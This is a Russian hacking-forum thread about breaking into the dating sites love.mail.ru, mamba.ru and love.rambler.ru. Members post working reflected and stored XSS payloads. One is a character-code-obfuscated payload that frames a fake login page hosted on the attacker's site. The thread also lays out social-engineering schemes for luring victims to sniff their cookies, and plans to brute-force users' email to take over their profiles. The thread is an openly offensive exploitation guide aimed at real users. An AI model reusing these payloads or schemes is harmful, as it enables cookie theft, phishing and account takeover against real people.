Можно ли что-нить сделать на lоve.mail.ru?

Discussion in 'Песочница' started by six111, 23 Aug 2005.

  1. six111

    six111 New Member

    Joined:
    13 Jul 2005
    Messages:
    24
    Likes Received:
    0
    Reputations:
    0
    Все таки вопрос о взломе love.mail.ru и подобных сайтов остаеться открытым.

    Не думаю, что у такихъ громоздких конструкций нет больше дырок через которые их можно вы??ать.))

    У кого какие мысли на это счет?
     
  2. qBiN

    qBiN Вот такой вот я :(

    Joined:
    20 Jan 2005
    Messages:
    834
    Likes Received:
    73
    Reputations:
    33
    Его и не закрывали.
    Не думай. Если интересно ищи их.
    У меня есть мысль "почему столько народу задоют тупые вопросы?"
     
  3. GreenBear

    GreenBear наркоман с медалью

    Joined:
    7 May 2005
    Messages:
    2,547
    Likes Received:
    1,398
    Reputations:
    612
    хм. вместе веселее....
    в асю тук тук (288983987)
     
  4. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    Пассивная XSS:
     
    _________________________
  5. Bader

    Bader New Member

    Joined:
    14 Feb 2006
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    Пассивная XSS:
    http://love.mail.ru/anketa.phtml?oid=1234567"><script>alert(/testing_by_censored!/)</script>


    Можно пожалуста по подробнее! Как это использовать?
     
    #5 Bader, 1 Mar 2006
    Last edited: 1 Mar 2006
  6. Bader

    Bader New Member

    Joined:
    14 Feb 2006
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0
    Как я понимаю. Пока еще никто не знает как там профиль можно вскрыть. И с брутом траблы. Жаль!

    Походу прощее узнать мыло у юзера, брутануть его, и далее через его мыло восстановить пароль профиля.
    :))))))
     
  7. censored!

    censored! Green member

    Joined:
    2 Nov 2004
    Messages:
    1,160
    Likes Received:
    299
    Reputations:
    156
    То что выше - уже не пашет. Надо опять искать.

    А так - пока теория (не проверялось)
    В анкете берешь себе имя "Love_Mail_Ru_закрывается" и где-нить в описании даешь ссылку и к ней комментарий "love.mail.ru закрывается!!! Читать всем!". По ссылке - твоя страница с какой-нить билебердой, на которой нулевым фреймом (но не просто фреймом - а немного по-другому оформленным (чтобы браузер не орал что доступ отклонен)) подгружается странница с пассивной xss. Ссылка (по которой она подгружается) тоже немного другая (нам нужна отсылка кук на снифер). После чего - как народ будет заходить, ты можешь пробовать полученные куки подставлять себе...
    Варианта два (грю же - не проверял) - тебя или не пустят вообще, либо пустят. Если пустят - то можешь что-нить там изменить. Но, опять же, я не знаю - можно ли там что изменить без ввода пароля. Но наверняка что-нить от чужого имени сделать можно.
    Ну и так же надо помнить - что love.mail.ru использует сервис _http://mambo.ru/ (как и многие другие сайты знакомств), так что что найдешь там - считай нашел на многих.
     
    _________________________
  8. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    Если б можно было ссылки рассылать в самой системе, было б чудно. кстати. сейчас я и попробую наверно заняться этим вопросом....
     
  9. Bader

    Bader New Member

    Joined:
    14 Feb 2006
    Messages:
    28
    Likes Received:
    4
    Reputations:
    0

    Ну как успехи???
     
  10. LeverOne

    LeverOne Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    52
    Likes Received:
    128
    Reputations:
    115
    Активная

    В духе ныне популярного хек-юродства представляю свою скромненькую активненькую ХSS на mamba.ru .

    Профайл - Моя страница - закладка "Дневник"

    Code:
    [img]" style="background-image:url('//')" onerror="javascript:alert(/lo/);[/img]
    что будет отображено как:

    HTML:
    <img src="" style="background-image:url('//')" onerror="javascript:alert(/lo/);">
    Дальше лирика.

    Данная XSS браузеронезависимая. Единственным ее недостатком является то, что закладка "Дневник" не доступна для всех третьих лиц на самых популярных сайтах системы мамба - love.mail.ru и love.rambler.ru . Однако закладка будет доступна вам для редактирования, даже если вы находитесь на этих сайтах, стоит только кликнуть по аналогичной ссылке:

    HTML:
    http://love.mail.ru/my/edit_home.phtml?afolder=dairy
    Это означает, что теоретически можно "наградить" юзера данной XSS, а потом разными непалевными способами впаривать ему ссылку на его же дневник, когда он сидит на сайтах типа love.mail.ru, и снифать его куки от почты. Но, Имхо, данный способ при доступных других менее предпочтителен. Наиболее реальным (из тех, что я рискну выложить в паблик) является переманивание юзера, сидящего на love.mail.ru на сайт мамбы и дальнейшая переадресация его на фейк страницы авторизации. При этом разумно использовать фрейм на всю страницу, чтобы оставить родительским адрес-бар:

    HTML:
    <frameset cols=100% rows=100% border=0 frameborder=0 framespacing=0><frame src=http://nash_sait.ru/fake.html frameborder=0></frameset>
    Кроме того, рекоментуется кодировать все это в Char . В итоге у вас долно получиться что-то вроде этого

    Code:
    [img]" style="background-image:url('//')" onerror="document.write(String.fromCharCode(60,102,114,97,109,101,115,101,116,32,99,111,108,115,61,49,48,48,37,32,114,111,119,115,61,49,48,48,37,32,98,111,114,100,101,114,61,48,32,102,114,97,109,101,98,111,114,100,101,114,61,48,32,102,114,97,109,101,115,112,97,99,105,110,103,61,48,62,60,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,110,97,115,104,95,115,97,105,116,46,114,117,47,102,97,107,101,46,104,116,109,108,32,102,114,97,109,101,98,111,114,100,101,114,61,48,62,60,47,102,114,97,109,101,115,101,116,62));[/img]
    что превратится в

    HTML:
    <img src="" style="background-image:url('//')" onerror="document.write(String.fromCharCode(60,102,114,97,109,101,115,101,116,32,99,111,108,115,61,49,48,48,37,32,114,111,119,115,61,49,48,48,37,32,98,111,114,100,101,114,61,48,32,102,114,97,109,101,98,111,114,100,101,114,61,48,32,102,114,97,109,101,115,112,97,99,105,110,103,61,48,62,60,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,110,97,115,104,95,115,97,105,116,46,114,117,47,102,97,107,101,46,104,116,109,108,32,102,114,97,109,101,98,111,114,100,101,114,61,48,62,60,47,102,114,97,109,101,115,101,116,62));">
    Как осуществить переманивание? Дело фантазии! Например, сказать юзеру, что у тебя в дневнике куча разной инфы и т.д. Главное - код на фейк-страницу быстро убрать, иначе все станет понятно.

    Куки на сайтах системы мамба привязаны к айпи. Но снифануть все же имеет смысл, поскольку можно поиметь куку "SECRET", решающую все проблемы.

    Мой путь к данной XSS был таков (может, кому будет интересно).
    Первое, что вам предложат, это вести адрес картинки.

    Code:
    [img]вставьте адрес картинки[/img]
    Но сделав это таким простым юзерским макаром

    HTML:
    [img]http://qwerty.ru/lo.jpg[/img]
    Вы не увидите в исходном коде и намека на картинку. Все отфильтруется нафиг! Небольшой опыт работы с ББ-кодами достаточен для того, чтобы понять, что фильтр хочет получить закавыченный атрибут, но его не находит. Хочешь кавычек? Их есть у меня!

    Code:
    [img]"http://qwerty.ru/lo.jpg"[/img]
    получаем на выходе

    HTML:
    <img src=""http://qwerty.ru/lo.jpg"">
    После такой глупости, сложность состояла только в том, чтобы найти мультибраузерный вариант XSS

    Так будет работать в IE и FF

    Code:
    [img]" onerror=alert('lo');"[/img]
    HTML:
    <img src="" onerror=alert('lo');"">
    потому что в Opera событие ошибки не происходит, когда aтрибут параметра src тега img пуст! А вставить туда валидную или невалидную картинку (ссылку), которую Opera будет рассматривать за ошибку, у нас не получится при всем желании!

    После некоторых попыток удалось найти вариант, сработавший в Opera 8.53

    Code:
    [img]" style="background-image:url('javascript:alert(\'lo\')');[/img]
    HTML:
    <img src="" style="background-image:url('javascript:alert(\'lo\')');">
    У этого кода есть 2 проблемы: во-первых, как мы знаем, javascript в url автоматически фильтруется FF, во-вторых, в последней версии Opera 9.20 это уже также реализовано (и может быть, было реализовано в более ранних).

    В конце концов удалось инициировать ошибку не пустым атрибутом параметра src , а невалидным юрлом в стайле.

    P.S.
    Все написанное автором данного поста является частью приснившимся ему теплой весенней ночью, а частью - случайно услышанным им в троллейбусе от неизвестных ему людей, лица которых он не видел. Автор не призывает получать несанкциронированные данные пользователей с помощью описанной информации, а высказывает лишь свое скромное мнение о возможных путях оного. Автор не несет никакой ответственности за использование данных сведений в противозаконных целях.

    P.P.S
    На 11.05.07 г. программеры mamba.ru вроде как протрезвели после праздников и убрали багу с невозможностью вставки картинок. Теперь простора для XSS еще больше прежнего.

    NEXT =>
     
    #10 LeverOne, 30 Apr 2007
    Last edited: 6 Aug 2007
    1 person likes this.
  11. LeverOne

    LeverOne Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    52
    Likes Received:
    128
    Reputations:
    115
    love.mail.ru / love.rambler.ru active XSS

    Теперь все это добро тупо перекочевало и собственно на мыло.ру, а также на рамблер.ру

    Активная XSS на поддоменах MAIL.RU и RAMBLER.RU

    Моя страница - Вкладка "Дневник" - "Добавить запись"

    Вставляем

    PHP:
    [img]http://img.mail.ru/mail/ru/images/dumb.gif"onload="alert(document.cookie); [/img]
    С таким же успехом можно добавлять комментарии к записям в чужих дневниках.

    Нет слов... Одни эмоции...
     
    1 person likes this.
  12. DRON-ANARCHY

    DRON-ANARCHY Отец порядка

    Joined:
    4 Mar 2005
    Messages:
    713
    Likes Received:
    142
    Reputations:
    50
    а хер ли толку с Xss на поддоменах?
     
Loading...